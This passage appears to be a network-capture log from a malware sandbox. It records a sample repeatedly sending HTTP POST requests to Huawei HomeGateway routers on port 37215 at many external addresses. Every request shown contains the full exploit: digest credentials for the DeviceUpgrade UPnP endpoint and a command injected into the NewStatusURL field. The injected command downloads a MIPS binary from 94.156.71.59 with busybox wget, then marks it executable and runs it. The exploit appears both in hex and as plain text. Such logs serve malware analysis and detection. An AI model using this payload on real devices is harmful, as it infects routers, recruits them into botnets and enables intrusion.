35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            327192.168.2.1346904197.116.245.4537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.255863905 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            328192.168.2.1332906156.172.0.8537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.256608963 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            329192.168.2.1332950156.146.151.1237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.257345915 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            330192.168.2.1352852197.130.110.2637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.258035898 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            331192.168.2.1353884156.254.58.4837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.258739948 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            332192.168.2.1358672197.171.135.2837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.259448051 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            333192.168.2.134614241.112.119.137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.260139942 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            334192.168.2.1344940197.195.196.7537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.260853052 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            335192.168.2.1351604197.95.0.5437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.261547089 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            336192.168.2.1347796197.194.180.3737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.262299061 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            337192.168.2.135755841.109.88.22837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.263048887 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
